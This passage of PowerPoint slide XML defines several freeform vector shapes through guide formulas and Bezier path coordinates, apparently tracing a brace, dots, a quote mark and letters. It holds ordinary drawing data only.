                <a:gd name="T46" fmla="*/ 106 w 177"/>
                <a:gd name="T47" fmla="*/ 66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7" h="498">
                  <a:moveTo>
                    <a:pt x="106" y="66"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="46"/>
                    <a:pt x="119" y="14"/>
                    <a:pt x="173" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="10"/>
                    <a:pt x="177" y="8"/>
                    <a:pt x="177" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="168" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="0"/>
                    <a:pt x="73" y="25"/>
                    <a:pt x="72" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="176"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="195"/>
                    <a:pt x="72" y="211"/>
                    <a:pt x="52" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="242"/>
                    <a:pt x="16" y="243"/>
                    <a:pt x="5" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="244"/>
                    <a:pt x="0" y="246"/>
                    <a:pt x="0" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="254"/>
                    <a:pt x="3" y="254"/>
                    <a:pt x="8" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="257"/>
                    <a:pt x="65" y="275"/>
                    <a:pt x="71" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="304"/>
                    <a:pt x="72" y="305"/>
                    <a:pt x="72" y="323"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="422"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="443"/>
                    <a:pt x="72" y="459"/>
                    <a:pt x="96" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="493"/>
                    <a:pt x="148" y="498"/>
                    <a:pt x="168" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="498"/>
                    <a:pt x="177" y="498"/>
                    <a:pt x="177" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="488"/>
                    <a:pt x="174" y="488"/>
                    <a:pt x="169" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="485"/>
                    <a:pt x="114" y="470"/>
                    <a:pt x="107" y="444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="440"/>
                    <a:pt x="106" y="439"/>
                    <a:pt x="106" y="421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="316"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="293"/>
                    <a:pt x="102" y="285"/>
                    <a:pt x="86" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="258"/>
                    <a:pt x="61" y="253"/>
                    <a:pt x="47" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="238"/>
                    <a:pt x="106" y="215"/>
                    <a:pt x="106" y="186"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="6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94" name="Freeform 835">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5EFE8F-165F-4945-97D3-340C573B37FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2019301" y="1774826"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="63" h="63">
                  <a:moveTo>
                    <a:pt x="63" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="63" y="47"/>
                    <a:pt x="63" y="3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95" name="Freeform 836">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43272FC2-4A86-4E73-AAB9-74231812A8CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2109788" y="1774826"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="63">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="3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96" name="Freeform 837">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8066F9-D0AD-45B1-97F2-850FDB4A2DBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2200276" y="1774826"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="63" h="63">
                  <a:moveTo>
                    <a:pt x="63" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="63" y="47"/>
                    <a:pt x="63" y="3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97" name="Freeform 838">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB54B9D-6C9C-4A1C-AAE8-17A1E62B2B85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1108076" y="1897063"/>
              <a:ext cx="47625" cy="52388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 135"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 130 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 135"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 89 w 135"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 130 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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147">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="89" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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98" name="Freeform 839">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97AE6DE-7CB5-4653-A786-887F169D4601}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1189038" y="1928813"/>
              <a:ext cx="66675" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 223"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 223"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 223"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 31 h 223"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 223"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 223"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 223"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 21 h 223"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 223"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 11 h 223"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 223"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 223"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 223"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 223"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 223"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 223"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 223 h 223"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 204 h 223"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 223 h 223"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 223"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="92" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="31"/>
                    <a:pt x="94" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="31"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="13"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="99" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="139"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="223"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="222"/>
                    <a:pt x="85" y="223"/>
                    <a:pt x="99" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="223"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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99" name="Freeform 840">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B860815D-4F47-449C-BACF-D0BE9672BCE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1276351" y="1928813"/>
              <a:ext cx="69850" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 223"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 223"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 169 w 204"/>
                <a:gd name="T27" fmla="*/ 94 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="223"/>
                    <a:pt x="115" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="31"/>
                    <a:pt x="108" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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0" name="Freeform 841">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BE8F73F-855D-4E91-9AB9-DC30A36D537E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1370013" y="1928813"/>
              <a:ext cx="68263" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 223"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 223"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 223"/>
                <a:gd name="T6" fmla="*/ 112 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 223"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 115 w 196"/>
                <a:gd name="T11" fmla="*/ 31 h 223"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 223"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 223"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 37 h 223"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 223"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 223"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 223 h 223"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25" fmla="*/ 16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23">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
